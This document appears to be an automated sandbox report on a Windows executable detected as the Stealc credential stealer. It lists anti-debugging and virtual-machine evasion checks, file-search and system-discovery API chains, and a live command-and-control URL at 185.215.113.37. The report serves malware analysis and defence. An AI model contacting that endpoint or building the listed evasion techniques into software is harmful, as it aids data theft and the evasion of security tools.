                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF822D second address: DF8237 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6999135DE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF8237 second address: DF8240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF8240 second address: DF8246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E06EEC second address: E06EF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E075A7 second address: E075AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E075AD second address: E075DD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F699913D301h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F699913D301h 0x00000010 push edi 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E078A1 second address: E078A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E078A5 second address: E078BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F699913D304h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E07A6D second address: E07A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E07A71 second address: E07A75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E07A75 second address: E07A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E07A7B second address: E07A94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F699913D304h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E07BDB second address: E07C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6999135DEFh 0x00000009 jmp 00007F6999135DF4h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E07C05 second address: E07C0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0AC3B second address: E0AC41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0AC41 second address: E0AC8A instructions: 0x00000000 rdtsc 0x00000002 je 00007F699913D2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 jmp 00007F699913D308h 0x00000016 jns 00007F699913D2F8h 0x0000001c popad 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 je 00007F699913D2FCh 0x00000026 jne 00007F699913D2F6h 0x0000002c je 00007F699913D2FCh 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DA8D second address: E0DA98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F6999135DE6h 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DA98 second address: E0DAA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F699913D2F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 508025A second address: 50802C4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6999135DF9h 0x00000008 xor al, FFFFFFF6h 0x0000000b jmp 00007F6999135DF1h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007F6999135DF0h 0x00000019 jmp 00007F6999135DF5h 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F6999135DECh 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50802C4 second address: 508030E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F699913D2FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F699913D302h 0x00000011 mov edx, esi 0x00000013 popad 0x00000014 mov di, ax 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d call 00007F699913D305h 0x00000022 pop esi 0x00000023 movsx ebx, si 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 508030E second address: 508032C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6999135DF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 508032C second address: 5080347 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F699913D307h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080378 second address: 5080391 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6999135DF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080391 second address: 5080397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080397 second address: 50803D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F6999135DF4h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F6999135DF7h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50803D0 second address: 508040B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F699913D309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F699913D308h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 508040B second address: 508041A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6999135DEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 508041A second address: 5080420 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080420 second address: 5080424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080424 second address: 508045C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F699913D308h 0x00000012 sbb esi, 263EB368h 0x00000018 jmp 00007F699913D2FBh 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D27754 second address: D27759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B81A7C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D1BA35 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D42763 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D2C417 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_009338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_009338B0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00934910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00934910
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0092DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0092DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0092E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_0092E430
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0092ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,1_2_0092ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00934570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_00934570
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0092F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0092F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00933EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00933EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_009216D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_009216D0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0092DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0092DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0092BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_0092BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00921160 GetSystemInfo,ExitProcess,1_2_00921160
                Source: file.exe, file.exe, 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000001.00000002.1386340367.000000000103E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000001.00000002.1386340367.00000000010B5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1386340367.0000000001085000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000001.00000002.1386340367.000000000103E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarep
                Source: file.exe, 00000001.00000002.1386340367.00000000010B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW}
                Source: file.exe, 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-13229
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-13232
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-13250
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-13283
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-13242
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_009245C0 VirtualProtect ?,00000004,00000100,000000001_2_009245C0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00939860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00939860
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00939750 mov eax, dword ptr fs:[00000030h]1_2_00939750
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_009378E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,1_2_009378E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7324, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00939600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_00939600
                Source: file.exe, file.exe, 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_00937B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00937980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,1_2_00937980
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00937850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,1_2_00937850
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00937A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,1_2_00937A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 1.2.file.exe.920000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.1340711226.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1386340367.000000000103E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7324, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 1.2.file.exe.920000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.1340711226.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1386340367.000000000103E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7324, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/18%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.php_17%VirustotalBrowse
                http://185.215.113.3718%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.php19%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/trueunknown
                http://185.215.113.37/e2b1563c6670f193.phptrueunknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37file.exe, 00000001.00000002.1386340367.000000000109B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1386340367.000000000103E000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/e2b1563c6670f193.php_file.exe, 00000001.00000002.1386340367.000000000109B000.00000004.00000020.00020000.00000000.sdmpfalseunknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                185.215.113.37
                		unknownPortugal
                		206894WHOLESALECONNECTIONSNLtrue

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1521035
                Start date and time:2024-09-28 03:22:10 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 3m 47s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:6
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:file.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@1/0@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 80%
                • Number of executed functions: 19
                • Number of non-executed functions: 85
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                185.215.113.37file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php

                Domains

                No context

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                • 185.215.113.16
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                • 185.215.113.103
                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                • 185.215.113.103
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                • 185.215.113.103
                file.exeGet hashmaliciousAmadeyBrowse
                • 185.215.113.16
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousAmadeyBrowse
                • 185.215.113.16

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                No created / dropped files found

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.9472024442379405
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:file.exe
                File size:1'846'784 bytes
                MD5:e904093ef887cb372b3fe7ab75e6c6c7
                SHA1:aece57bd3cbb0bc1818fe026100f30783a6e3f55
                SHA256:b99711aa1ee5a0ca9cfcc53dff0ffcab9f2800afad74a0633b1488fe2afa47b7
                SHA512:6876fa64ce5fc0f7a2b80368d2128b96262cf2dc9889bb2f5d3068c20dfd04f37fecd3095e941535cbc1de9be996411b3f617062f7364bf2ad28b404843dfd2d
                SSDEEP:49152:cusYocs8XFCmtRatofH5UIcOKO6KSRcIleAuFdJ:ck9s8XAuRy4H5CR9WoeAu
                TLSH:2B8533577D77EA39EDDF02FE0B77D529760039867ABD5002A11832D26119FE8F829438
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L.../..f...........

                File Icon

                Icon Hash:00928e8e8686b000

